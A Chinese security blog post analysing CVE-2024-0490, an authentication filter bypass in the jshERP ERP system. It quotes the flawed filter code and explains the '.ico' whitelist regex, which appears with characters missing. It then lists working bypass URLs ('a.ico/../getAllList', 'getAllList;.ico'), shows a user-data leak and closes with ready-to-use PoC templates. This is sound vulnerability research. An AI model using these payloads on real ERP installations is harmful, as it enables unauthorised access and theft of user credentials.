CVE-2024-0490 ERP接口访问绕过漏洞分析

已于 2024-05-06 09:55:09 修改
阅读量474 收藏 5
点赞数 9
分类专栏: java代码审计 文章标签: 安全 java spring boot web安全
于 2024-01-25 17:17:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shelter1234567/article/details/135848066
版权

本次我们继续以漏洞挖掘者的视角,来分析此次漏洞产生的原因......

参考 

NVD - CVE-2024-0490https://nvd.nist.gov/vuln/detail/CVE-2024-0490 项目下载地址,此次测试版本为3.1版本 实际测试3.2也存在

https://github.com/jishenghua/jshERP/releaseshttps://github.com/jishenghua/jshERP/releases

接口调用栈

我们在正常调用接口时, 如getAllList接口,调用栈如下

ac38ff4d42de45e3808bf583c4e6a762.png

其中有一个filter 额外的引人注意,doFilter:68 它位于com.jsh.erp.filter包下,是作者自己定义的过滤器

分析自定义过滤器

我们看看用作者定义的Filter  

package com.jsh.erp.filter;
public class LogCostFilter implements Filter {

    private static final String FILTER_PATH = "filterPath";
    private static final String IGNORED_PATH = "ignoredUrl";

    private static final List<String> ignoredList = new ArrayList<>();
    private String[] allowUrls;
    private String[] ignoredUrls;//重点分析
    @Resource
    private RedisService redisService;
...
    public void doFilter(ServletRequest request, ServletResponse response,
                         FilterChain chain) throws IOException, ServletException {
        HttpServletRequest servletRequest = (HttpServletRequest) request;
        HttpServletResponse servletResponse = (HttpServletResponse) response;
        String requestUrl = servletRequest.getRequestURI();
        //具体,比如:处理若用户未登录,则跳转到登录页
        Object userId = redisService.getObjectFromSessionByKey(servletRequest,"userId");
        if(userId!=null) { //如果已登录,不阻止
            chain.doFilter(request, response);
            return;
        }
        if (requestUrl != null && (requestUrl.contains("/doc.html") ||
            requestUrl.contains("/register.html") || requestUrl.contains("/login.html"))) {
            chain.doFilter(request, response);
            return;
        }
        if (verify(ignoredList, requestUrl)) {//重点关注
            chain.doFilter(servletRequest, response);
            return;
        }
        if (null != allowUrls && allowUrls.length > 0) {
            for (String url : allowUrls) {
                if (requestUrl.startsWith(url)) {
                    chain.doFilter(request, response);
                    return;
                }
            }
        }
        servletResponse.sendRedirect("/login.html");
    }
...
}

放行了/doc.html

比较注意的是verify, 不过再次之前看看作者定义的这个Filter类初始化是怎样的

@Override
public void init(FilterConfig filterConfig) throws ServletException {
    String filterPath = filterConfig.getInitParameter(FILTER_PATH);
    if (!StringUtils.isEmpty(filterPath)) {
        allowUrls = filterPath.contains("#") ? filterPath.split("#") : new String[]{filterPath};
    }

    String ignoredPath = filterConfig.getInitParameter(IGNORED_PATH);
    if (!StringUtils.isEmpty(ignoredPath)) {
        ignoredUrls = ignoredPath.contains("#") ? ignoredPath.split("#") : new String[]{ignoredPath};
        for (String ignoredUrl : ignoredUrls) {
            ignoredList.add(ignoredUrl);
        }
    }
}

ef5429c53f9647b09ac9f85e547ea87c.png

允许访问的url 是这么多,也就是说这些访问url,我们的请求会chain.doFilter(request, response);会被正常转发,也是一个绕过点

继续分析ignoredList这参数
28f01cfef01542e985cfb1ad3c91a2db.png

.ico这个被添加到了ignoredList , 难道想忽略url的这个后缀吗?

对象的初始化分析完了,接下来重点分析这段代码,看看verify的逻辑。目前我们已经知道ignoredList 中存在值.ico

    if (verify(ignoredList, requestUrl)) {//重点关注
        chain.doFilter(servletRequest, response);
        return;
    }

 verify方法分析

追入verify方法

private static boolean verify(List<String> ignoredList, String url) {
    for (String regex : ignoredList) {
        Pattern pattern = Pattern.compile(regexPrefix + regex + regexSuffix);
        Matcher matcher = pattern.matcher(url);
        if (matcher.matches()) {
            return true;
        }
    }
    return false;
}

 第一轮regex变成.ico,之后加上前缀与后缀pattern = “^..ico.$” ,这个正则表达式,它的含义是:以任意字符(包括空字符)开始,然后匹配.ico字符串,最后以任意字符结束。换句话说,它匹配包含.ico字符串的文本

匹配url是否存在返回bool值,若if条件成立调用chain.doFilter(servletRequest, response);

可以看的出来作者想放行网站的图标像favicon.ico这种的资源文件,但是这也无意中可能照成某些接口被访问的漏洞

 

过滤器绕过

有经验的大佬可能已经想到了绕过的方法!我先不透露,先分享自己的方法吧,基于模糊测试。

首先通过网络检索收集到足够多的payload ,之后进行模糊测试

思路:

1,../跳转
        /jshERP-boot/user/a.ico/../getAllList
        /jshERP-boot/user/doc.html/../getAllList

2,截断
         /jshERP-boot/user/getAllList%00.ico // %00阶段老古董了
         /jshERP-boot/user/getAllList%0d%0a%0d%0a.ico //CRLF 注入
        /jshERP-boot/user/getAllList?a=.ico //get传参 /jshERP-boot/user/getAllList;.ico //分号表结束
        /jshERP-boot/user/getAllList#.ico //# 是用来指导浏览器动作

测试结果
        /jshERP-boot/user/a.ico/../getAllList 成功

        /jshERP-boot/user/doc.html/../getAllList 成功
        /jshERP-boot/user/getAllList%00.ico 400
        /jshERP-boot/user/getAllList%0d%0a%0d%0a.ico 404
        /jshERP-boot/user/getAllList?a=.ico 302
        /jshERP-boot/user/getAllList;.ico 成功
        /jshERP-boot/user/getAllList#.ico 400

 如此我们得到了两个有效payload(其中../的逻辑是一样的所以不算)
/jshERP-boot/user/a.ico/../getAllList 与 /jshERP-boot/user/getAllList;.ico

漏洞复现

访问url 信息泄露

http://127.0.0.1:9999/jshERP-boot/user/getAllList;.ico

 7ea2ad428f184768aa50bdf5617fd042.png

可以看到全部的用户信息,随后我们用这些信息尝试登录一下,这里可用提供文档接口调试,

6c8816a8815241d7b37d32f193b9ebdd.png

 也可用burp

03c25a27e6744e6697c28c7f48ae2f3e.png

 以上只是其中的一种利用方式,当然我们可以访问添加用户的接口,添加一个用户之后登录即可。

漏洞修补

可以看出作者把.ico 以及ignoredList 都拿掉了,这是其1

e493328096d84f5d8898782cd00a94d9.png

其2 
对userService.getUser() 也进行了优化

 

附赠poc

http:
  - method: GET
    path:
      - "{{BaseURL}}/jshERP-boot/user/a.ico/../getAllList"

or

http:
  - method: GET
    path:
      - "{{BaseURL}}/jshERP-boot/user/getAllList;.ico"

or

http:
        - method: GET
        path: - "{{BaseURL}}/jshERP-boot/user/doc.html/../getAllList"

 

 

 

 

昵称还在想呢
关注
专栏目录
Apache Ofbiz XML-RPC RCE漏洞复现(CVE-2023-49070)
0xSec
12-06 1875
2020年,为修复 CVE-2020-9496 增加权限校验,存在绕过。2021年,增加 Filter 用于拦截 XML-RPC 中的恶意请求,存在绕过。2023年四月,彻底删除 xmlrpc handler 以避免同类型的漏洞产生。尽管主分支在四月份已经移除了XML-RPC组件,但在Apache OFBiz的正式发布版本中,仅最新版本18.12.10彻底废除了XML-RPC功能。
2023年国家护网0day-poc/exp漏洞全汇总(目前已更新到91个..实时更新中...)
08-21 3472
2023年国家护网目前收集到的0day和1day漏洞的poc或者exp大汇总,截止目前已更新到91个漏洞,本文会实时更新,有新的漏洞都会加上
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 2114
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1367
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
2024 HW前需要关注的高危漏洞清单
MachineGunJoe666
06-04 1702
当前,在规模较大和重要性较高的网络攻防演练中,对于蓝队(防守方),在演练中遇到红队(攻击方)0day的机会还是相当大的,要在短时间达成演习目的,拿到目标靶机的权限,动用一些先进的武器(0day)进行快速突破是最高效的。从过往经验来看,所出现的0day漏洞主要包括Web服务、组件的反序列化漏洞,具体包括OA系统、邮件系统、CMS等暴露在边界上的系统较多,在演练中这类系统面临主要的火力攻击。因此做为蓝队(防守方)有必要在攻防演练前、期间对己方系统资产的漏洞情况进行深度和及时的排查,在攻防演练前及时修补漏洞,在攻
泛微 E-Office文件上传漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
08-15 1214
泛微OA是中国领先的OA办公自动化产品商,是一套集OA、合作、工作流一体化的企业级信息化管理软件。它可以帮助企业实践现办公自动化、信息协同、决策智能化等功能,提升企业生产效率和管理水平,是企业数字化转型和数字化办公的好工具。泛微OA提供了完整的办公自动化解决方案,包括邮件管理、日程管理、文档管理、签批审查、会议管理、考勤管理、人力资源管理等模块,支持PC端、移动端多种应用场景。同时,它还可以与各种企业管理系统(如ERP、CRM等系统)进行整合,形成完整的业务流程和信息链条。漏洞概述。
2024-11月漏洞汇总-漏洞情报-威胁漏洞情报-1day-0day漏洞
最新发布
Pazhoulabhp的博客
11-11 522
Teaching 在线教学平台getDictItemsByTable存在SQL注入漏洞 TOTOLINK LR350 formAuthLogin未授权访问漏洞 泛微E-Cology9 QRcodeBuildAction LoginSSO身份认证绕过导致SQL注入漏洞 宏景eHR uploadLogo存在任意文件上传漏洞 易思智能物流无人值守系统 SingleLogin 存在SQL注入漏洞 NextGen-Mirth-Connect-XStream远程代码执行漏洞 A2425美团代付三合一微信小程序系统
【传送点】上千漏洞复现复现集合 exp poc 持续更新
失心少年
11-28 4292
漏洞复现】OpenTSDB 2.4.0 命令注入(CVE-2020-35476)漏洞复现【漏洞复现】熊海cms 存在sql注入 附poc【漏洞复现】Array VPN任意文件读取漏洞漏洞复现】好视通视频会议系统(fastmeeting) toDownload.do接口存在任意文件读取漏洞 附POC【漏洞复现】金蝶云星空管理中心 ScpSupRegHandler接口存在任意文件上传漏洞 附POC【漏洞复现】DPTech VPN存在任意文件读取漏洞
2024护网行动 | 红队实战手册 (建议收藏)零基础入门到精通
资深程序员,曾自学JAVA,C#,如今从业于网安行业
07-23 1021
如果你也想学习:黑客&网络安全的零基础攻防教程。
漏洞复现-用友UFIDA-YongYou系列
aming小老弟
10-03 1929
UFIDA是中国的一家知名企业软件公司,全称为用友软件股份有限公司(Yonyou Software Co . , Ltd . )。该公司成立于 1988 年,总部位于北京,是中国领先的企业管理软件和云服务提供商之一。UFIDA主要专注于开发和提供企业级软件解决方案,包括财务管理、人力资源管理、采购管理、销售管理、供应链管理、生产制造管理等。它的产品被广泛应用于各种行业,如制造业、服务业、金融业、医疗保健和公共事业等。UFIDA致力于帮助企业提高管理效率、优化业务流程,并提供数据分析和决策支持工具。
PHP常用的安全函数作用
sheji888的专栏
11-06 566
这些函数和方法有助于提升PHP应用的安全性,但安全是一个综合性的问题,需要综合使用多种手段,如输入验证、输出编码、会话管理、错误处理等。在PHP开发中,安全是非常重要的一个方面。
【销帮帮-注册_登录安全分析报告-试用页面存在安全隐患】
weixin_46641057的博客
11-09 883
杭州逍邦网络科技有限公司成立于2015年,是国内一线CRM品牌和企服领域知名品牌。致力为客户提供专业的客户全生命周期管理和数字化销售管理服务,助力企业提升业绩,让企业更成功。销帮帮拥有强大而灵活的“PaaS+低代码”能力。在吸取了同行滑动验证码的经验后,自己研发了独特风格的那个验证码, 从逆向代码来看, 不仅借鉴了同行的技术原理,还在防抓取上下了功夫,防模拟器鼠标,物理鼠标和逻辑鼠标定位不一致判断措施,解决思路为让JS 这部分代码失效或这采用 物理定位鼠标的部分,目前采用的是物理鼠标的方式。
利用城市安全监测系统,筑牢自然灾害防线
njysiot的博客
11-06 262
对于洪水灾害,城市安全监测系统可以通过水位传感器、雨量传感器等设备,实时监测河流、湖泊和城市排水系统的水位变化以及降雨量。此外,系统还可以对城市的地下管网进行监测,及时发现管道堵塞和泄漏等问题,防止城市内涝的发生。在应对地震灾害方面,城市安全监测系统中的地震监测传感器可以实时捕捉地壳的微小震动,通过数据分析提前预测地震的发生。同时,系统还可以对建筑物的结构进行实时监测,评估地震对建筑物的影响,为后续的救援和重建工作提供重要依据。同时,还需要加强部门之间的协作和信息共享,形成应对自然灾害的合力。
加固筑牢安全防线:多源威胁检测响应在企业网络安全运营中的核心作用
安胜ANSCEN的博客
11-06 635
星盾”多源威胁检测响应平台,一款基于XDR理念的一站式安全运营平台,由长年实战对抗中形成的攻防知识经验指导设计,结合大数据、大模型与安全编排自动化响应技术,提供全局监测预警、自动化研判、智能响应、联防联控等能力,体系化提升全局态势感知和主动防御能力,规范化安全运营协同管理工作。传统威胁检测技术与单一检测技术均存在明显的局限性,为了提升网络安全防护能力,企业需要采用更加全面和多元化的威胁检测与响应策略,包括整合多种检测技术、引入智能化分析引擎、加强安全监控和预警能力等方面的工作。
漏洞与攻击技术详解
QQ_778132974的博客
11-06 610
一、漏洞的定义与分类漏洞是指在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,这些缺陷使得攻击者能够在未授权的情况下访问或破坏系统。漏洞可以按照不同的标准进行分类,如:按照类型分类:缓冲区溢出漏洞:由于程序在处理输入时没有进行足够的边界检查,导致输入的数据超出了缓冲区的大小,从而覆盖了相邻的内存区域,造成程序崩溃或执行恶意代码。提权漏洞:攻击者利用系统中的某些缺陷,提升自己的权限,从而能够执行更高权限的操作。随着攻击技术的不断进步,攻击者能够利用更多的漏洞来执行攻击,从而给网络安全带来更大的威胁。
Rust安全性与最佳实践————安全编程技巧
好看资源网的博客
11-10 593
Rust通过其独特的内存安全模型、强类型检查和严格的编译期约束,大大减少了常见的内存漏洞、并发问题等安全隐患。Rust的并发模型与内存模型密切相关。在本节中,我们将探讨常见的安全漏洞及其防护措施、Rust的安全特性以及如何利用Crates进行安全性检查和加强代码的安全性。Rust设计之初就将内存安全作为其核心目标,采用严格的内存管理模型来避免常见的内存错误,如空指针、悬挂指针和内存泄漏等。是一个用于检查Rust项目依赖中已知安全漏洞的工具,它会扫描项目中的Crates并报告任何存在已知安全漏洞的依赖。
VLAN高级+以太网安全
怨行客
11-06 1091
主机A查找ARP缓存表。发现没有记录,主机A发送ARP请求广播。主机B接收到请求并检查目标IP地址。主机B发送ARP响应单播给主机A。主机A接收响应并更新ARP缓存表。主机A开始与主机B通信。
域名邮箱推荐:安全与稳定的邮件域名邮箱!
danplus的博客
11-07 452
域名邮箱登录是现代企业不可或缺的工具,掌握从注册到登录的全过程,对于提升工作效率和品牌形象至关重要。烽火邮箱,专业域名邮箱推荐,免费企业邮箱,稳定安全,短期邮箱灵活选择!
《C++在金融领域的技术革命:高效、安全与创新的融合》
xy520521的博客
11-10 459
利用 C++和机器学习算法,可以对大量的历史数据进行分析,挖掘出潜在的风险因素,为金融机构提供更加科学的风险管理决策依据。在高频交易中,交易系统需要快速地处理大量的市场数据,执行复杂的算法交易策略,并在极短的时间内完成交易订单的发送和接收。通过 C++的优化算法和高效的内存管理,交易系统能够在高并发的情况下保持稳定的运行,确保交易的准确性和及时性。C++作为一种强大的编程语言,以其高效的执行性能、强大的内存管理能力和丰富的功能库,在金融领域中占据着重要的地位。C++与区块链技术在金融领域的结合。
深信服CVE-2024-38077漏洞扫描工具及修复方案
资源摘要信息:"深信服CVE-2024...通过以上详尽的介绍,用户可以全面理解如何使用深信服CVE-2024-38077漏洞扫描工具进行漏洞检测、分析和修复。重要的是,用户应该保持警觉,及时更新软件和系统,以确保网络环境的安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

昵称还在想呢

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值